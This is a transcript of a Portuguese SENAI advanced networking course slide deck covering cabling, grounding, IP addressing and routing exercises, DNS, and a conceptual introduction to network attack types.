62282591 senai curso avancado redes

315
1 REDES AVANÇADAS 12/09/2009 Eudes Danilo Mendonça [email protected] http://www.4shared.com/file/ 59507480/8e48421c/SENAI_- _CURSO_AVANCADO_REDES.html

Upload: tamyllys-ally-mota

Post on 08-Aug-2015

79 views

Category:

Documents


13 download

TRANSCRIPT

Page 1: 62282591 Senai Curso Avancado Redes

1

REDES AVANÇADAS

12/09/2009Eudes Danilo Mendonç[email protected]://www.4shared.com/file/59507480/8e48421c/SENAI_-_CURSO_AVANCADO_REDES.html

Page 2: 62282591 Senai Curso Avancado Redes

Pré-requisitos: Conhecimentos básicos em redes

Quem sou eu? Quem são vocês? O que esperam da matéria? Quais as experiências em Redes? Conhecimentos em Windows Server

e/ou Linux?

2

Apresentação

Page 3: 62282591 Senai Curso Avancado Redes

I - Revisão dos Conhecimentos Básicos de Redes: Conceitos de Redes, equipamentos, periféricos e conexão da rede  II - Noções de Cabeamento Estruturado: Conhecimento de Asbuilt, certificação de uma rede, elaboração de um

anteprojeto de rede, elaboração de um projeto de redes. III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede,

roteamento de rede IV - Redes Ponto-a-Ponto Projeto;

V - Segurança de Rede: Noções de segurança física e lógica, objetivos, introdução a ataques, vulnerabilidade, como previnir ataques

VI - Windows 2003 Server: Instalação, configuração de serviços (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos, servidor de Impressão, Active Direct, Segurança em nível de recursos - Permissões de arquivos, Backup e Recuperação, Logs e Serviços, Monitoramento físico e lógico da rede

VII – Linux: Instalação, configuração de serviços (DHCP, FTP, APACHE, SSH), Segurança em nível de Recursos - Permissões de arquivos, Backup e Recuperação, Logs, Serviços, acessos apartir de estações Windows e Transmissão de arquivos entre windows e linux

 VIII - Ambiente Misto: Integração de serviços (WEB, FTP, BACKUP) entre a plataforma Windows 2003 e Linux com os

clientes Windows XP

3

Sinopse:

Page 4: 62282591 Senai Curso Avancado Redes

Plano de Aula:Utilização de Notebook e datashow e prática nos

desktops de vocês;

Serão avaliações Mensais:

4

Avaliação:

Page 5: 62282591 Senai Curso Avancado Redes

Materiais do curso e outros do autor Senai- Apostila

http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_-_TURMA_AVANCADA.html

- Redes Avançadas Power Pointhttp://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html

- Redes Básicas – Power Point http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html

EsamazSegurança de Sistemashttp://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html Firewallhttp://www.4shared.com/file/40014575/5e5292cb/Firewall.html Script Linuxhttp://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html Vírushttp://www.4shared.com/file /42802741/12513457/virus.html Criptografiahttp://www.4shared.com/file/43349581/53517583/Criptografia.html

Segurança de Redeshttp://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html

5

Page 6: 62282591 Senai Curso Avancado Redes

Dúvidas ??

6

Page 7: 62282591 Senai Curso Avancado Redes

I – Revisão dos Conhecimentos Básico de Redes

7

Page 8: 62282591 Senai Curso Avancado Redes

O que é Redes de computadores?

• Possibilitar o compartilhamento de informações (programas e dados) armazenadas nos computadores da rede;

  

• Permitir o compartilhamento de recursos associados às máquinas interligadas;

 

• Permitir a troca de informações entre os computadores interligados;

 

• Permitir a troca de informações entre usuários dos computadores interligados;

 

• Possibilitar a utilização de computadores localizados remotamente;

 

• Permitir o gerenciamento centralizado de recursos e dados;

 

• Melhorar a segurança de dados e recursos compartilhados

8

Page 9: 62282591 Senai Curso Avancado Redes

Porque ligar micros em rede? Palavra chave

“Compartilhamento”.

9

Page 10: 62282591 Senai Curso Avancado Redes

Tipos de Redes

• Usada em redes pequenas (normalmente até 10 micros); • Baixo Custo; • Fácil implementação; • Baixa segurança; • Sistema simples de cabeamento; • Micros funcionam normalmente sem estarem conectados

a rede;\• Micros instalados em um mesmo ambiente de trabalho; • Não existe um administrador de rede; • Não existe micros servidores; • A rede terá problemas para crescer de tamanho.

10

Ponto x Ponto

Page 11: 62282591 Senai Curso Avancado Redes

Cliente x Servidor Deseja ter uma maior segurança na rede. (Nesse

tipo de rede aparece uma figura denominada servidor. O servidor é um computador que oferece recursos especializados, para os demais micros da rede, ao contrário do que acontece com a rede ponto-a-ponto onde os computadores compartilham arquivos entre si e também podem estar fazendo um outro processamento em conjunto).

Outra vantagem das redes cliente/servidor é a forma centralizada de administração e configuração, o que melhora a segurança e organização da rede.

11

Page 12: 62282591 Senai Curso Avancado Redes

Tipos de Servidores Servidor de Arquivos: É um servidor responsável pelo armazenamento

de arquivos de dados – como arquivos de texto, planilhas eletrônicas, etc... É importante saber que esse servidor só é responsável por entregar os dados ao usuário solicitante (cliente), nenhum processamento ocorre nesse servidor, os programas responsáveis pelo processamento dos dados dos arquivos deve estar instalados nos computadores clientes.

Servidor de Impressão: É um servidor responsável por processar os pedidos de impressão solicitados pelos micros da rede e enviá-los para as impressoras disponíveis. Fica a cargo do servidor fazer o gerenciamento das impressões.

Servidor de Aplicações: É responsável por executar aplicações do tipo cliente/servidor como, por exemplo, um banco de dados. Ao contrário do servidor de arquivos, esse tipo de servidor faz processamento de informações.

Servidor de Correio Eletrônico: Responsável pelo processamento e pela entrega de mensagens eletrônicas. Se for um e-mail destinado a uma pessoa fora da rede, este deverá ser passado ao servidor de comunicação (firewall)

Servidor de Comunicação (Firewall): Usado para comunicação da sua rede com outras redes, como a Internete Se você acessa a Internet através de uma linha telefônica convencional, o servidor de comunicação pode ser um computador com uma placa de modem ou conexões com ADSL ou LPCD. 12

Page 13: 62282591 Senai Curso Avancado Redes

Vantagens e Desvantagem do Cliente x Servidor Custo Maior desempenho do que as redes ponto-a-ponto; Implementação necessita de especialistas; Melhor desempenho que as redes ponto-a-ponto; Alta segurança; Configuração e manutenção na rede é feita de forma centralizada; Existência de servidores, que são micros capazes de oferecer

recursos aos demais micros da rede

13

Page 14: 62282591 Senai Curso Avancado Redes

II - Noções de Cabeamento Estruturado

14

Page 15: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Conector RJ45 Macho

15

Page 16: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Cabo UTP

UTP Color CodesPar 1 Branco-Azul (BA) / Azul (A)Par 2 Branco-Laranja (BL) / Laranja (L)Par 3 Branco-Verde (BV) / Verde (V)Par 4 Branco-Marrom (BM) / Marrom (M)

16

Page 17: 62282591 Senai Curso Avancado Redes

Cabeamento EstruturadoCabo UTP / CATEGORIAS Categoria 1 – cabo de par trançado tradicional, que é o utilizado para

telefonia (instalado antes de 1983). Não é recomendado para utilização em redes locais.

Categoria 2 – cabo certificado para transmissão de dados (possui 4 pares trançados). Sua utilização em redes também não é recomendável.

Categoria 3 – esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s em uma Token Ring. Este cabo permite que até quatro telefones normais ou dois multilinhas sejam conectados ao equipamento da companhia telefônica.

Categoria 4 – esta categoria suporta taxas de transmissão de até 16 Mbit/s em uma rede Token Ring. Este cabo possui quatro pares.

Categoria 5 – possui 4 pares trançados com oito torções. Suporta taxas de transmissão de 100 Mbit/s. Sua utilização é adequada para redes Fast Ethernet e redes ATM. No início dos anos 90, 60% dos edifícios possuíam este tipo de cabo (EUA).

Categoria 6 – também possui 4 pares trançados. Suporta taxas de transmissão de até 155 Mbit/s. Sua utilização é adequada a redes Fast Ethernet para transmissão de dados e voz.

17

Page 18: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Crimpador

Testador

18

Page 19: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Delay

É um dos itens mais importantes, pois a estruturação física pode influenciar na performance e velocidade da rede. É ideal que tenha o menor número de segmentação e quando ocorrer a segmentação que seja centralizado os servidores, pontos de saída da rede e principais clientes no switch principal.

19

Page 20: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Processo da Crimpagem Normal - Padronização EIA/TIA 568ª – Conhecida

como “seqüência de crimpagem de normal”. Utilizada para conexão de um microcomputador a um HUB ou SWITCH.

20

EIA/TIA-568ª1. Branco-Verde2. Verde3. Branco-Laranja4. Azul5. Branco-Azul6. Laranja7. Branco-Marrom8. Marrom

Page 21: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Crossover - Um cabo crossover consiste na

interligação de 2 (dois) computadores pelas respectivas placas de rede sem ser necessário a utilização de um concentrador (Hub ou Switch) ou a ligação de modems a CABO com a maquina cliente com conectores do tipo RJ45. A alteração dos padrões das pinagens dos cabos torna possível a configuração de cabo crossover ou cabo direto. A ligação é feita com um cabo de par trançado (na maioria das vezes) onde se tem: em uma ponta o padrão T568A, e, em outra o padrão T568B (utilizado também com modems ADSL).

21

1ª ponta do cabobranco verde verdebranco laranja azulbranco azul laranjabranco marrommarrom

2ª ponta do cabo branco laranja laranja branco verde azulbranco azul verdebranco marrommarrom

Page 22: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado 1ª Prática: Processo da

Crimpagem

22

Page 23: 62282591 Senai Curso Avancado Redes

Cabo Normal

23

Page 24: 62282591 Senai Curso Avancado Redes

Cabo Crowwover

24

Page 25: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado Certo

Errado

25

Page 26: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado O que não pode ocorrer

26

Page 27: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado O que não pode ocorrer

27

Page 28: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

28

Page 29: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

29

Page 30: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

30

Page 31: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

31

2ª Prática: Processo da Crimpagem

Page 32: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

32

Page 33: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

33

Page 34: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

34

Page 35: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

35

Page 36: 62282591 Senai Curso Avancado Redes

Cabeamento Estruturado

36

Page 37: 62282591 Senai Curso Avancado Redes

Sugestão para a Rede Elétrica Ideal ter a cada circuito de 10 A

até 3 tomadas; Não permitir que sejam ligados

outros equipamentos como: Copiadoras, ventiladores, motores elétricos, ou qualquer outro que exija ou produza ruído na linha.

37

Page 38: 62282591 Senai Curso Avancado Redes

Sugestão para a Rede Elétrica

38

Page 39: 62282591 Senai Curso Avancado Redes

Sugestão para a Rede Elétrica As tomadas devem ser do tipo universal

de três pinos (tripolares) e a ligação fase/neutro/terra

As tensões aproximadas na rede elétrica deverão ser as seguintes:Entre terra e fase = 117 VEntre neutro e fase = 115 VEntre terra e neutro = 2,5 V(valor Maximo tolerado)

39

Page 40: 62282591 Senai Curso Avancado Redes

Sugestão para a Rede Elétrica

40

Page 41: 62282591 Senai Curso Avancado Redes

Aterramento O terra dos equipamentos de informática DEVE ser

totalmente independente dos demais terras existentes.

Observando o seguinte na instalação:Ser construído á distância mínima de 2,40m dos outros

terras do quadro e do neutro e a uma distância mínima de 25,00 do terra de pára-raios.

O cabo que liga as barras de aterramento ao quadro deve ser encapado, possuir bitola compatível com a distancia entre o sistema e o quadro, e NÃO DEVERÁ ESTAR NUNCA CONECTADO AO NEUTRO.Não são aconselháveis distâncias maiores que 50m entre o terra e o quadro de distribuição.

41

Page 42: 62282591 Senai Curso Avancado Redes

Aterramento Material necessário para um aterramento simples:- 3 barras de cobre, com 2 a 3 metros de comprimento e

15cm de diâmetro.- 6 abraçadeiras de bronze para as barras de cobre.- 10 metros de fio isolado, de bitola idêntica á dos fios fase

e neutro.- Sal grosso, carvão vegetal e enxofre em quantidades

suficientes para cobrir o poço dos eletrodos.- Água destilada suficiente para regar a mistura.- As barras de cobre são chamadas eletrodos de

aterramento; dão uma referência de terra de 0 volte uma conexão á terra para descargas elétricas atmosféricas. Também fornecem uma trajetória de impedância baixa á terra ( valor máximo de 25 ohms).

42

Page 43: 62282591 Senai Curso Avancado Redes

Aterramento

43

Page 44: 62282591 Senai Curso Avancado Redes

Aterramento Consequências da falta de aterramento:- Aparição de BAD CLUSTERS no HD ou até

mesmo a perda total. Isto não demora a acontecer.

- Você poderá perder seu HD em 2 ou 3 meses.

- Danos na placa mãe.- Danos na memória, que podem vir a causar

perda repentina de dados e ou congelamento de todo o sistema.

44

Page 45: 62282591 Senai Curso Avancado Redes

DOCUMENTAR UMA REDE Físicamente:- Asbuilt Lógicamente:- Software Inventário;

(http://www.softwarepublico.gov.br/spb/ver-comunidade?community_id=3585)

- Help Desk; (http://ocomonphp.sourceforge.net/)

- Analyzer Network;   (Network supervisor – 3COM)

- Logs (Firewall, event view, /var/log/messages)

45

Page 46: 62282591 Senai Curso Avancado Redes

Criação de AnteProjeto de Rede Veja quando falamos em projeto, não

queremos e não vamos formar engenheiros aqui, nossa intenção e mostrar que uma documentação bem feita pode ser o diferencial dentro desta área , o projeto pode ser escrito, não necessariamente um desenho, lógico que se possuir o desenho é muito melhor, mesmo porque hoje existem ferramentas para auxiliar neste propósito.

46

Page 47: 62282591 Senai Curso Avancado Redes

Criação de AnteProjeto de Rede

47

Page 48: 62282591 Senai Curso Avancado Redes

Elaboração de um Projeto de Rede

48

Informações repassada pelo empresa:- 1 Caso: Rede 100 % cabeada;- 2 Caso: Rede Mista

Criação da Documentação do Projeto:- Crianção do Site Survey;- Criação do anteprojeto;- Entrega do Asbuilt pela empresa

prestadora do serviço;

Page 49: 62282591 Senai Curso Avancado Redes

Criação dos Site Survey – 1 Caso

49

Page 50: 62282591 Senai Curso Avancado Redes

Criação dos Site Survey – 2 Caso

50

Page 51: 62282591 Senai Curso Avancado Redes

Visão Macro

Page 52: 62282591 Senai Curso Avancado Redes

Exercício: Criação de anteprojeto

52

Informações repassada pelo empresa (Site Survey):

- As paredes externas são de cerâmico aparente e as paredes internas, incluindo as salas laterais , de reboco liso e pintado;

- O teto é de forro falso e o piso é de granito natural;- O departamento de telemarketing possui divisórias baixas

acústicas em formas de “baias”, de madeira, revestida com espuma de poliuretano e tecido grosso;

- Toda iluminação é feita com luminárias com 4 lâmpadas fluorescentes de 40 W x 220 V e localizada no centro geométrico de cada ambiente;

- Altura entre o forro e o piso é de 2,6m;- A sala de treinamento, recebe freqüentemente pessoas não

ligadas a empresa, além disso seu layout é constantemente alterado;

Page 53: 62282591 Senai Curso Avancado Redes

Exercício: Criação de anteprojeto

53

Page 54: 62282591 Senai Curso Avancado Redes

54

III – Noções de Protocolo de rede

Page 55: 62282591 Senai Curso Avancado Redes

Protocolos - Definição

Page 56: 62282591 Senai Curso Avancado Redes

56

Page 57: 62282591 Senai Curso Avancado Redes

A Mensagem em Camadas

Remetente

MensagemEscrita

Envelope

Agência

Rodovia/Malote

Envelope

Agência

MensagemEscrita

Destinatário-Você tem uma idéia e deseja comunica-la a outra pessoa

-Tem de escolher a forma de expressar essa idéia

-Você decide como de uma forma apropriada

-Enfim, de fato expõe sua idéia

Page 58: 62282591 Senai Curso Avancado Redes

Protocolo TCP/IP

Page 59: 62282591 Senai Curso Avancado Redes

O que configurar ?

IP MASCARA GATEWAY DNS

59

Page 60: 62282591 Senai Curso Avancado Redes

Onde, o que e por que Configurar

Page 61: 62282591 Senai Curso Avancado Redes

IP e MASCARA

61

Page 62: 62282591 Senai Curso Avancado Redes

62

Endereços IP Endereço IP: Indentificador de Rede + Indentificador de HOST

Identificador darede

Identificador dohost

Endereço IP de 32 bits

REDE

internet

REDE REDE

REDE

hosts com omesmoidentificador derede.

hosts comidentificadores

de rededistintos.

host

Page 63: 62282591 Senai Curso Avancado Redes

63

Como atribuir IP’s para rede abaixo?

...

230 computadores 200 computadores

...

SÃO PAULO CURITIBA

Page 64: 62282591 Senai Curso Avancado Redes

64

roteador

O roteador possui dois endereços IP, um para cada rede.

200.0.0.2

endereço classe CMÁSCARA: 255.255.255.0

identificador de rede identificador do host

200.0.0.3 200.0.0.4 200.0.0.5

200.0.0.1

200.0.1.1

200.0.1.2 200.0.1.3 200.0.1.4 200.0.1.5

Page 65: 62282591 Senai Curso Avancado Redes

65

Como Atribuir IP’s para rede abaixo?

...

400 computadores 600 computadores

...

SÃO PAULO CURITIBA

500 computadores

...

RIO DE JANEIRO

Page 66: 62282591 Senai Curso Avancado Redes

Solucionar Principais Problemas Usando o Utilitário IPConfig O utilitário IPConfig é muito útil para determinar se as

configurações de rede atuais são desejadas. Vários erros podem ser detectados através deste utilitário. Execute-o através de um Prompt de Comando (clique em Start -> Run e digite CMD), digitando ipconfig /all e teclando Enter.

Page 67: 62282591 Senai Curso Avancado Redes

Solucionar Principais Problemas Conflito de IP: Ocorre quando um IP manual é atribuído à

máquina e já existe outro computador na rede com o mesmo IP. Nesse caso, a tela do Ipconfig deve se parecer com a seguinte:

Note que os campos IP e Máscara de Subrede estão zerados. Essa é a principal característica de um conflito de IPs.

- Configuração incompleta: Certifique-se de que os campos DNS Servers e Default Gateway não estão em branco.

Page 68: 62282591 Senai Curso Avancado Redes

Solucionar Principais Problemas

Note que, como não há servidor DNS e nem Default Gateway configurados, o computador somente poderá enviar e receber dados dentro da rede local e com outros computadores

Page 69: 62282591 Senai Curso Avancado Redes

Solucionar Principais Problemas Usando o Utilitário PING

Ela se refere ao utilitário do TCP/IP denominado "Ping", que tem como função testar se um host está ativo, enviando um pacote de dados para esse host e pedindo uma reposta caso ele esteja online e funcionando corretamente. Então, "pingar" o endereço de loopback simplesmente testa se sua máquina inicializou o TCP/IP corretamente. Para fazer isso, entre em um Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter. Você também poderá pingar no IP da placa assim como de qualquer máquina da rede, assim como por nome dependendo de alguns serviços. Vale ser ressalta que o ping pode ser desabilitado.

Page 70: 62282591 Senai Curso Avancado Redes

Solucionar Principais Problemas Usando o Utilitário NETSTAT e TELNET

NETSTAT – verifica os serviços que localmente a máquina/host está provendo

TELNET: Tem como função testar se o serviço está ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se você local ou remoto da máquina que está provendo o serviço.

Page 71: 62282591 Senai Curso Avancado Redes

GATEWAY

71

Page 72: 62282591 Senai Curso Avancado Redes

Roteamento Indireto

Origem e Destino estão em redes diferentes

REDE10.35.143.0

10.35.143.1010.35.144.15

Tabela de Roteamento

Destino Gateway 10.35.143.0 DIRETO 0.0.0.0 10.35.143.1

Router

REDE10.35.144.0

Tabela de Roteamento

Destino Gateway 10.35.143.0 10.35.143.110.35.144.0 10.35.144.1 ....... .......

10.35.143.1 10.35.144.1

Tabela de Roteamento

Destino Gateway 10.35.144.0 DIRETO0.0.0.0 10.35.144.1

Page 73: 62282591 Senai Curso Avancado Redes

Exemplo de roteamentoExe m plo de uma rede In tranet constitu ída de duas

redes físicas conectadas por um ro teador.

192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4

192.168.1.5

192.168.0.5

192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4

roteadorinterno

rede 192.168.0.x

rede 192.168.1.x servidor

rede interna de um a em presa.

Page 74: 62282591 Senai Curso Avancado Redes

Tabelas de Roteamento

Page 75: 62282591 Senai Curso Avancado Redes

75

Exemplo de Tabela de Roteamento

TABELA DO ROTEADOR 1:Rede Gateway Interface200.134.51.0 (255.255.255.0) 200.134.51.1 200.134.51.1200.17.98.0 (255.255.255.0) 200.17.98.23 200.17.98.230.0.0.0 (0.0.0.0) 200.130.0.2 200.130.0.1

roteador 1

roteador 2

INTERNET

REDE 200.134.51.X

REDE 200.17.98.X

200.17.98.23

200.130.0.1 200.130.0.2

200.134.51.1

Page 76: 62282591 Senai Curso Avancado Redes

76

Exercício 1 Construa a tabela de roteamento do

Roteador 1

200.17.98.0200.17.98.23

INTERNET

1

255.255.255.0

200.134.51.0

255.255.255.0

200.17.98.1 200.134.51.1

3INTERNET

2

200.0.0.1 200.0.0.2

Page 77: 62282591 Senai Curso Avancado Redes

77

TABELA DE ROTEAMENTO

Rede Destino Mascara Gateway CustoInterface

Page 78: 62282591 Senai Curso Avancado Redes

TABELA DE ROTEAMENTO

Rede Destino Mascara Gateway CustoInterface

200.134.51.0 255.255.255.0 200.134.51.1 1200.134.51.1

200.17.98.0 255.255.255.0 200.17.98.1 1200.17.98.1

0.0.0.0 0.0.0.0 200.0.0.1 1200.0.0.2

0.0.0.0 0.0.0.0 200.17.98.23 2200.17.98.1

Page 79: 62282591 Senai Curso Avancado Redes

79

Exercício 2: Utilizando a classe C: 200.0.0.0 (255.255.255.0)

– A) distribua os IP’s nas duas redes abaixo – B) defina a tabela de roteamento do roteador 1.

INTERNET1 2100 computadores

100 computadores

Page 80: 62282591 Senai Curso Avancado Redes

DNS

80

Page 81: 62282591 Senai Curso Avancado Redes

DNS - Domain Name Service Padrão Aberto para Resolução de Nomes Hierárquicos– Agrupa nomes em domínios.– A árvore de nomes é armazenada num

banco de dados distribuídobanco de dados distribuído. Especificações do DNS

– RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.• Expecificações da Internet Task Force

– Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley

University para a versão 4.3 SD Unix

Page 82: 62282591 Senai Curso Avancado Redes

Demonstrações: Serviços de NomesDemonstrações: Serviços de Nomes

A função principal dos serviços de nomes é traduzir nomes de domínio para os seus respectivos endereços IP’s.

www.oi.comwww.cade.comwww.oi.com = 10.10.10.1www.cade.com = 35.35.2.80

www.av.com www.ufg.br

www.av.com = 20.20.20.80www.ufg.br =50.75.96.8

Servidor DNSServidor DNS

Page 83: 62282591 Senai Curso Avancado Redes

83

IV – Redes Ponto a Ponto

Page 84: 62282591 Senai Curso Avancado Redes

Elaboração de Projeto

84

Page 85: 62282591 Senai Curso Avancado Redes

Elaboração de Projeto

Criar uma formulário / checklist de informações que deverão que serão coletadas junto a conversa inicial.

85

Qual a finalidade ?Quem vai acessar (de onde, como, que solução) ?Quantos computadores ?De onde vai ser o acesso ?Q o s ?Local Físico (disponibilidade para cabeamento)

Page 86: 62282591 Senai Curso Avancado Redes

Elaborar uma proposta / Solução. Itens informados:

- 2 casas (distante 500 mts) sendo que uma é tombada pelo patrimônio histórico;

- Acesso de usuário em uma rede local e clientes via Web (internet);

- Acesso de funcionários a pastas específicas de arquivos, assim como acesso ao sistema corporativo;

- 500 computares (300 comp. Em uma casa e 200 em outra);

- Não posso para meu acesso nem por 1 minuto

86

Page 87: 62282591 Senai Curso Avancado Redes

Ilustração do funcionamento do TCP/IP Vídeo “Guerreiros da Internet”

Page 88: 62282591 Senai Curso Avancado Redes

88

V - Segurança de Redes

Page 89: 62282591 Senai Curso Avancado Redes

89

O sistema informático mais seguro não é utilizável

O sistema informático mais utilizável é inseguro

Só existe um computador 100% seguro, o desligado.

Page 90: 62282591 Senai Curso Avancado Redes

90

Introdução A Segurança da Informação pode ser

definida como a proteção de dados contra a revelação acidental ou intencional a pessoas não autorizadas, e contra alterações não permitidas.

A segurança no universo computacional divide-se em:– Segurança Física– Segurança Lógica

Page 91: 62282591 Senai Curso Avancado Redes

91

Introdução (cont.)

Objetivo da Segurança Informática– Seja qual for a dimensão de um

sistema informático, deve procurar-se atingir, na sua exploração, os seguintes objetivos:• Integridade do equipamento •Confidencialidade e a qualidade da

informação•Prontidão do sistema (eficiência x

eficácia)

Page 92: 62282591 Senai Curso Avancado Redes

O que você está tentandoproteger?

Seus dadosIntegridadePrivacidadeDisponibilidade

Seus recursos Sua reputação

92

Page 93: 62282591 Senai Curso Avancado Redes

Contra o que você está tentandose proteger?

Roubo de senhas Engenharia Social BUG & Backdoors Falha de autenticação Falha de protocolo Obtendo Informações Negando serviços (DoS)

93

Page 94: 62282591 Senai Curso Avancado Redes

94

Objetivos da Segurança O objetivo da segurança da informação

abrange desde uma fechadura na porta da sala de computadores até o uso de técnicas criptográficas sofisticadas e códigos de autorização.

O estudo não abrange somente o crime computacional (hackers), envolve qualquer tipo de violação da segurança, como erros em processamento ou códigos de programação.

Page 95: 62282591 Senai Curso Avancado Redes

Quem?O que?

Quando?Como?Onde?

Porque?

Objetivos da Segurança “Segurança não é uma tecnologia”

Page 96: 62282591 Senai Curso Avancado Redes

96

Objetivos da Segurança

A segurança de dados tem por objetivo restringir o uso de informações (softwares e dados armazenados) no computador e dispositivos de armazenamento associados a indivíduos selecionados.

Page 97: 62282591 Senai Curso Avancado Redes

97

Os objetivos da Segurança da Informação são: Preservação do patrimônio da

empresa (os dados e as informações fazem parte do patrimônio).– Deve-se preservá-lo protegendo-o contra

revelações acidentais, erros operacionais e contra as infiltrações que podem ser de dois tipos:•Ataques passivos (interceptação) •Ataques ativos (interrupção, modificação

e Fabricação)

Page 98: 62282591 Senai Curso Avancado Redes

Ataques PassivosAtaques Passivos

Intercepção

Análise do conteúdo das mensagens

Análise do tráfego

Ataques passivos

O objetivo é obter informação que está a ser transmitida. 

Este tipo de ataques é muito difícil de detectar. O esforço de protecção deve ser no sentido da prevenção.

Page 99: 62282591 Senai Curso Avancado Redes

Ataques Passivos

Análise do conteúdo das mensagens – Escutar e entender as informações.

Análise do tráfego – O oponente pode determinar a origem e identidade das comunicações e pode observar a frequência e comprimento das mesmas. Esta informação pode ser útil para determinar a natureza da comunicação. Os ataques passivos são muito difíceis de detectar porque não envolvem nenhuma alteração de dados. A ênfase ou o esforço deve desenvolvido no sentido da prevenção e não da detecção.

Page 100: 62282591 Senai Curso Avancado Redes

Emissor Receptor

Intercepção

Intercepção

Intercepção – Quando utilizadores não autorizados conseguem aceder a recursos para os quais não estavam autorizados. É um ataque à confidencialidade. A parte não autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violação de cabos de comunicação, para capturar dados da rede, cópia ilícita de pastas e programas, etc.

Page 101: 62282591 Senai Curso Avancado Redes

Ataques AtivosAtaques Ativos

Interrupção(Disponibilidade)

Modificação(Integridade)

Fabricação(Autenticidade)

Ataques Ativos

Envolvem alguma modificação de dados. Este tipo de ataques é muito difícil de prever, já que,

para isso, seria necessário uma proteção completa de todos os tipos de comunicações e de canais. Por esta razão, o esforço de protecção deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.

Page 102: 62282591 Senai Curso Avancado Redes

Emissor Receptor

Interrupção

Interrupção

Interrupção – A informação de um sistema torna-se indisponível ou é destruída. É um ataque à disponibilidade.Exemplos: Destruição de peças de Hardware, o corte de linhas de comunicação, a inoperância do sistema de ficheiros, etc.

Page 103: 62282591 Senai Curso Avancado Redes

Emissor Receptor

Modificação

Modificação

Modificação – uma parte não autorizada, não só acede à informação, mas também a modifica. É um ataque de integridade. Exemplos: alteração de valores num ficheiro de dados; alteração de um programa para que ele funcione de maneira diferente ou modificação do conteúdo de mensagens transmitidas pela rede.

Page 104: 62282591 Senai Curso Avancado Redes

Emissor Receptor

Fabricação

Fabricação

Fabricação – uma parte não autorizada insere dados falsos no sistema. É um ataque à autenticidade. Exemplos: inserção de mensagens simuladas na rede ou a adição de registos a um ficheiro.

Page 105: 62282591 Senai Curso Avancado Redes

105

O que é ataque?

Ataque é toda ação realizada com intuito ou não de causar

danos.

Page 106: 62282591 Senai Curso Avancado Redes

Vulnerabilidades

Todo computador é vulnerável a ataques. (Possui informação)

• Tipos de Vulnerabilidades– Vulnerabilidades Físicas (Meio, Construção)– Vulnerabilidades Naturais (Desastres Naturais)– Vulnerabilidades de Hardware e

Software(Falhas)– Vulnerabilidades de Media (Roubos de Media)– Vulnerabilidades de Comunicação (Hacker)– Vulnerabilidades de Humanos (Usuários)– Vulnerabilidades sobre Exploit (Brechas, Copias)

Page 107: 62282591 Senai Curso Avancado Redes

Um ataque típico

107

Page 108: 62282591 Senai Curso Avancado Redes

Anatomia de um ataque

ReconhecimentoVarredura

Enumeração

InvasãoEscalando privilégios

Acesso à informação

Ocultação de rastros

Negação de Serviços

Instalação de back doors

Page 109: 62282591 Senai Curso Avancado Redes

109

Page 110: 62282591 Senai Curso Avancado Redes

110

Page 111: 62282591 Senai Curso Avancado Redes

O que um hacker ataca ?

Aplicações Aplicações

Banco de dados Banco de dados

Sistemas operacional Sistemas operacional

Serviços de rede Serviços de rede

Page 112: 62282591 Senai Curso Avancado Redes

112

Tipos de ataques conhecidos• Escutas

– Packet Sniffing – escuta e inspeciona cada pacote da rede– IP/Session Hijacking – interceptação da seção pelo invasor

• Senha– Uso de dicionário de senhas – Força bruta – tentativa e erro

• Outros ataques– Alteração de site (web defacement)– Engenharia social – Ataque físico às instalações da empresa– Uso de cavalos de tróia e códigos maliciosos– Trashing – revirar lixo em busca de informações– War dialing – liga para vários números de telefone para

identificar os que tem modem instalado

Page 113: 62282591 Senai Curso Avancado Redes

113

Motivação para o Ataque

• Por quê existem as invasões aos sistemas?– Orgulho– Exibicionismo/fama– Busca de novos desafios– Curiosidade– Protesto– Roubo de informações– Dinheiro– Uso de recursos adicionais– Vantagem competitiva– Vingança

Page 114: 62282591 Senai Curso Avancado Redes

114

Exemplo: Oliberal 10/02/08

Page 115: 62282591 Senai Curso Avancado Redes

Caso Real

Atualmente 70% das quebras de segurança corporativas são geradas internamente.

Page 116: 62282591 Senai Curso Avancado Redes

Perfil do Fraudador*:• 68% estão na Média e Alta Gerências• 80% tem curso superior completo• Predominantemente do Sexo Masculino• Idade média entre 31 e 40 anos*Pesquisa sobre crimes econômicos - PWC 05

Caso Real

Page 117: 62282591 Senai Curso Avancado Redes

117

Tipos de ataques conhecidos• Negação de serviços

